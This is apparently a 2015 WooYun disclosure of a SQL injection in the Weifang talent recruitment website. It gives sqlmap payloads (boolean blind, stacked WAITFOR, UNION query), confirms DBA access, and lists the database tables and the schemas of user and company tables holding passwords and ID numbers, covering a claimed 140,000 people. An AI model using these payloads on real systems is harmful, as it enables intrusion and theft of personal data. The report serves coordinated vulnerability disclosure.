当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157082

漏洞标题:潍坊人才网SQL注入(DBA权限)14万数据泄露

相关厂商:潍坊人才网

漏洞作者: BlackWolf

提交时间:2015-12-02 02:02

修复时间:2016-01-18 16:50

公开时间:2016-01-18 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

注入

详细说明:

http://**.**.**.**/wpage/content.jsp?id=2947
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2947 AND 2735=2735
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=2947;WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=2947 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR
(113)+CHAR(118)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(117)+CHAR(83)+CHAR(103)+CHAR(89
)+CHAR(81)+CHAR(105)+CHAR(73)+CHAR(81)+CHAR(82)+CHAR(86)+CHAR(73)+CHAR(111)+CHAR(8
3)+CHAR(87)+CHAR(77)+CHAR(114)+CHAR(116)+CHAR(87)+CHAR(77)+CHAR(90)+CHAR(79)+CHAR(
84)+CHAR(65)+CHAR(102)+CHAR(106)+CHAR(104)+CHAR(97)+CHAR(115)+CHAR(70)+CHAR(97)+CH
AR(70)+CHAR(75)+CHAR(106)+CHAR(102)+CHAR(117)+CHAR(118)+CHAR(117)+CHAR(71)+CHAR(65
)+CHAR(109)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL,NULL--
---
[10:34:35] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[10:34:35] [INFO] testing if current user is DBA
current user is DBA:    True

漏洞证明:

注入点:

1.jpg


库名:

2.jpg


表名:
Database: wfrcw
[48 tables]
+--------------+
| dtproperties |
| t_adv        |
| t_comcx_user |
| t_comcx_user |
| t_comfiter2  |
| t_comfiter2  |
| t_comgdfiter |
| t_company    |
| t_comrdfiter |
| t_dyzj       |
| t_fzmsgsys   |
| t_fzmsgxx    |
| t_fzwz       |
| t_fzxx       |
| t_gjcx       |
| t_gjpc       |
| t_gjrc       |
| t_info       |
| t_jiaozhu    |
| t_jlxm       |
| t_link       |
| t_log        |
| t_msgsys     |
| t_msgxx      |
| t_qt         |
| t_qtyg       |
| t_sc_user    |
| t_sc_user    |
| t_user       |
| t_wadmin     |
| t_wadv       |
| t_wconfig    |
| t_wdc        |
| t_wdc        |
| t_wdlb       |
| t_wfk        |
| t_wg         |
| t_wh         |
| t_whxm       |
| t_wmenu      |
| t_wnews      |
| t_wqq        |
| t_wsm        |
| t_wsq        |
| t_wt         |
| t_zp         |
| t_zwcx       |
| t_zwcx       |
+--------------+


2000企业用户数据:
Database: wfrcw
Table: t_company
[57 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| address | varchar  |
| cjrq    | datetime |
| ckcs    | int      |
| com     | varchar  |
| cxqx    | int      |
| cxrq1   | datetime |
| cxrq2   | datetime |
| cxsl    | int      |
| da      | varchar  |
| dlcs    | int      |
| dlrq    | datetime |
| email   | varchar  |
| fax     | varchar  |
| gdpx    | int      |
| gdrq    | datetime |
| gdszrq  | datetime |
| gkbz    | varchar  |
| hylx    | varchar  |
| id      | int      |
| ifemail | varchar  |
| ifgd    | varchar  |
| ifjl    | varchar  |
| ifjr    | varchar  |
| iflx    | varchar  |
| ifxy    | varchar  |
| ifxz    | varchar  |
| ip      | varchar  |
| jj      | text     |
| jtcs    | int      |
| jzrq    | datetime |
| lxr     | varchar  |
| mobile  | varchar  |
| name    | varchar  |
| pass    | varchar  |
| phone   | varchar  |
| pic     | varchar  |
| post    | varchar  |
| px      | int      |
| qq      | varchar  |
| rdbz    | varchar  |
| rdpx    | int      |
| rdrq    | datetime |
| rdszrq  | datetime |
| redrq   | datetime |
| rs      | varchar  |
| sex     | varchar  |
| shbz    | varchar  |
| szd     | varchar  |
| tybz    | varchar  |
| web     | varchar  |
| wt      | varchar  |
| wz      | varchar  |
| xz      | varchar  |
| zcrq    | datetime |
| zczj    | varchar  |
| zw      | varchar  |
| zxbz    | varchar  |
+---------+----------+


3.jpg


Database: wfrcw
Table: 
14万个人用户数据:
t_user
[64 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| address | varchar  |
| age     | varchar  |
| byrq    | datetime |
| byxx    | varchar  |
| cjrq    | datetime |
| ckcs    | int      |
| cs      | int      |
| da      | varchar  |
| dlrq    | datetime |
| email   | varchar  |
| gl      | varchar  |
| grzz    | text     |
| gzdq    | varchar  |
| gzjl    | text     |
| hj      | varchar  |
| hylx    | varchar  |
| hyzk    | varchar  |
| id      | int      |
| ip      | varchar  |
| jlbz    | int      |
| ksqz    | varchar  |
| lx      | varchar  |
| mobile  | varchar  |
| mz      | varchar  |
| name    | varchar  |
| pass    | varchar  |
| phone   | varchar  |
| pic     | varchar  |
| post    | varchar  |
| pth     | varchar  |
| pxjl    | text     |
| qq      | varchar  |
| qzfs    | varchar  |
| rxrq    | datetime |
| sex     | varchar  |
| sg      | varchar  |
| shbz    | varchar  |
| sp1     | varchar  |
| sp2     | varchar  |
| szd     | varchar  |
| tc      | text     |
| tybz    | varchar  |
| web     | varchar  |
| wt      | varchar  |
| wy1     | varchar  |
| wy2     | varchar  |
| xl      | varchar  |
| xmbz    | varchar  |
| xy      | varchar  |
| yx      | varchar  |
| zc      | varchar  |
| zjhm    | varchar  |
| zjlx    | varchar  |
| zs      | text     |
| zwhy1   | varchar  |
| zwhy2   | varchar  |
| zwlb1   | varchar  |
| zwlb2   | varchar  |
| zwlbid  | int      |
| zxbz    | varchar  |
| zylb    | varchar  |
| zymc    | varchar  |
| zyzt    | varchar  |
| zzmm    | varchar  |
+---------+----------+


4.jpg

修复方案:

过滤

版权声明:转载请注明来源 BlackWolf@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-04 16:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价